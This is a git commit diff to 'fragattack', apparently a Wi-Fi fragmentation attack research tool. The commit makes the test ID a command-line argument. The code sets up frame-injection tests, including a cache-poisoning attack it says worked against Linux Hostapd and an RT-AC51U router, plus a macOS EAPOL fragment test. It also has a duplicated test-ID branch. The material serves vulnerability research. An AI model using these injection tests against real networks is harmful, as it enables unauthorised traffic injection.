fragattack: specify test ID as argument

This commit is contained in:
Mathy 2020-03-30 13:53:56 -04:00
parent 82e308f1b2
commit 82385b5972

View File

@ -164,7 +164,7 @@ class Test(metaclass=abc.ABCMeta):
@abc.abstractmethod
def check(self, p):
pass
return False
class PingTest(Test):
def __init__(self, ptype, fragments):
@ -178,6 +178,8 @@ class PingTest(Test):
return self.check_fn(p)
def generate(self, station):
log(STATUS, "Generating ping test", color="green")
# Generate the header and payload
header, request, self.check_fn = generate_request(station, self.ptype)
@ -196,6 +198,12 @@ class LinuxTest(Test):
Frag(Frag.Connected, False)
])
self.ptype = ptype
self.check_fn = None
def check(self, p):
if self.check_fn == None:
return False
return self.check_fn(p)
def generate(self, station):
header, request, self.check_fn = generate_request(station, self.ptype)
@ -224,6 +232,12 @@ class MacOsTest(Test):
Frag(Frag.BeforeAuth, False)
])
self.ptype = ptype
self.check_fn = None
def check(self, p):
if self.check_fn == None:
return False
return self.check_fn(p)
def generate(self, station):
# First fragment is the start of an EAPOL frame
@ -236,7 +250,7 @@ class MacOsTest(Test):
# By sending to broadcast, this fragment will not be reassembled
# though, meaning it will be treated as a full frame (and not EAPOL).
_, request, self.check_fn = generate_request(station, self.ptype)
frag2 = create_fragments(header, data=request, num_frags=1)
frag2, = create_fragments(header, data=request, num_frags=1)
frag2.addr1 = "ff:ff:ff:ff:ff:ff"
self.fragments[0].frame = frag1
@ -272,9 +286,9 @@ class Station():
def __init__(self, daemon, mac, ds_status):
self.daemon = daemon
self.options = daemon.options
self.test = daemon.options.test
self.txed_before_auth = False
self.txed_before_auth_done = False
self.first_connect = True
self.obtained_ip = False
# Don't reset PN to have consistency over rekeys and reconnects
@ -315,7 +329,7 @@ class Station():
if self.test != None and self.test.check != None and self.test.check(p):
log(STATUS, "SUCCESSFULL INJECTION", color="green")
print(repr(p))
self.test = Test()
self.test = None
def send_mon(self, data, prior=1):
"""
@ -385,40 +399,6 @@ class Station():
encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
return encrypted
def generate_tests(self):
# Simple ping as sanity check
self.test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True, flags=Frag.GetIp)])
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
self.test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True),
Frag(Frag.Connected, True, flags=Frag.Reconnect)])
# Two fragments over different PTK keys
#self.test = self.generate_test_ping(REQ_DHCP,
# [Frag(Frag.BeforeAuth, True, wait_rekey=True),
# Frag(Frag.AfterAuth, True)])
# TODO:
# - Test case to check if the receiver supports interleaved priority
# reception. It seems Windows 10 / Intel might not support this.
# - Test case with a very lage aggregated frame (which is normally not
# allowed but some may accept it). And a variation to check how APs
# will forward such overly large frame (e.g. force fragmentation).
# - 1.1 Encrypted (= sanity ping test)
# 1.2 Plaintext (= text plaintext injection)
# 1.3 Encrpted, Encrypted
# 1.4 [TKIP] Encrpted, Encrypted, no global MIC
# 1.5 Plaintext, plaintext
# 1.6 Encrypted, plaintext
# 1.7 Plaintext, encrypted
# 1.8 Encrypted, plaintext, encrypted
# 1.9 Plaintext, encrypted, plaintext
# 2. Test 2 but first plaintext sent before installing key
log(STATUS, "Constructed test case", color="green")
def handle_connecting(self, peermac):
# If the address was already set, it should not be changing
assert self.peermac == None or self.peermac == peermac
@ -428,16 +408,10 @@ class Station():
self.reset_keys()
self.time_connected = None
# Generate test cases once we know the MAC addresses
# XXX TODO FIXME : Dynamically generate payloads when needed
if self.first_connect:
self.generate_tests()
self.first_connect = False
def inject_next_frags(self, trigger):
frame = None
while self.test.next_trigger_is(trigger):
while self.test != None and self.test.next_trigger_is(trigger):
Frag = self.test.next(self)
if Frag.encrypted:
assert self.tk != None and self.gtk != None
@ -500,6 +474,9 @@ class Station():
self.send_mon(eapol)
def check_flags_and_inject(self, trigger):
if self.test == None:
return
flag = self.test.next_flag()
if flag == Frag.GetIp:
if self.obtained_ip:
@ -955,15 +932,57 @@ class Supplicant(Daemon):
def cleanup():
daemon.stop()
def prepare_tests(test_id):
if test_id == 0:
# Simple ping as sanity check
test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True, flags=Frag.GetIp)])
elif test_id == 1:
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True),
Frag(Frag.Connected, True, flags=Frag.Reconnect)])
elif test_id == 1:
test = MacOsTest(REQ_DHCP)
# Two fragments over different PTK keys
#self.test = self.generate_test_ping(REQ_DHCP,
# [Frag(Frag.BeforeAuth, True, wait_rekey=True),
# Frag(Frag.AfterAuth, True)])
# TODO:
# - Test case to check if the receiver supports interleaved priority
# reception. It seems Windows 10 / Intel might not support this.
# - Test case with a very lage aggregated frame (which is normally not
# allowed but some may accept it). And a variation to check how APs
# will forward such overly large frame (e.g. force fragmentation).
# - 1.1 Encrypted (= sanity ping test)
# 1.2 Plaintext (= text plaintext injection)
# 1.3 Encrpted, Encrypted
# 1.4 [TKIP] Encrpted, Encrypted, no global MIC
# 1.5 Plaintext, plaintext
# 1.6 Encrypted, plaintext
# 1.7 Plaintext, encrypted
# 1.8 Encrypted, plaintext, encrypted
# 1.9 Plaintext, encrypted, plaintext
# 2. Test 2 but first plaintext sent before installing key
return test
if __name__ == "__main__":
log(WARNING, "\nRemember to use a modified backports and ath9k_htc firmware!\n")
log(WARNING, "Remember to use a modified backports and ath9k_htc firmware!\n")
if "--help" in sys.argv or "-h" in sys.argv:
print("\nSee README.md for usage instructions.")
quit(1)
elif len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} interface test_id")
quit(1)
options = TestOptions()
options.interface = sys.argv[1]
options.test = prepare_tests(int(sys.argv[2]))
# Parse remaining options
start_ap = argv_pop_argument("--ap")